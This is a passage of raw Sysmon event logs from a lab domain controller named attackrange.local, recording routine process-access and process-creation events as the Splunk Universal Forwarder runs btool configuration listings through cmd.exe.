12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-E300-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-64EE-6064-E200-00000000AE01}62806308C:\Windows\system32\cmd.exe{266CAFBE-64EE-6064-E300-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.746{266CAFBE-64EE-6064-E300-00000000AE01}6324C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EE-6064-E200-00000000AE01}6280C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000008216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-E200-00000000AE01}6280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.725{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-E200-00000000AE01}6280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.725{266CAFBE-64EE-6064-DB00-00000000AE01}70607064C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64EE-6064-E200-00000000AE01}6280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-64EE-6064-E200-00000000AE01}6280C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64EE-6064-DB00-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000008208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.709{266CAFBE-64EE-6064-E100-00000000AE01}44806180C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-E100-00000000AE01}4480C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-E100-00000000AE01}4480C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-64EE-6064-E000-00000000AE01}71487152C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64EE-6064-E100-00000000AE01}4480C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.457{266CAFBE-64EE-6064-E100-00000000AE01}4480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EE-6064-E000-00000000AE01}7148C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000008199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-E000-00000000AE01}7148C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-E000-00000000AE01}7148C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-64EE-6064-DF00-00000000AE01}71367140C:\Windows\system32\cmd.exe{266CAFBE-64EE-6064-E000-00000000AE01}7148C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.450{266CAFBE-64EE-6064-E000-00000000AE01}7148C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EE-6064-DF00-00000000AE01}7136C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000008191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-DF00-00000000AE01}7136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 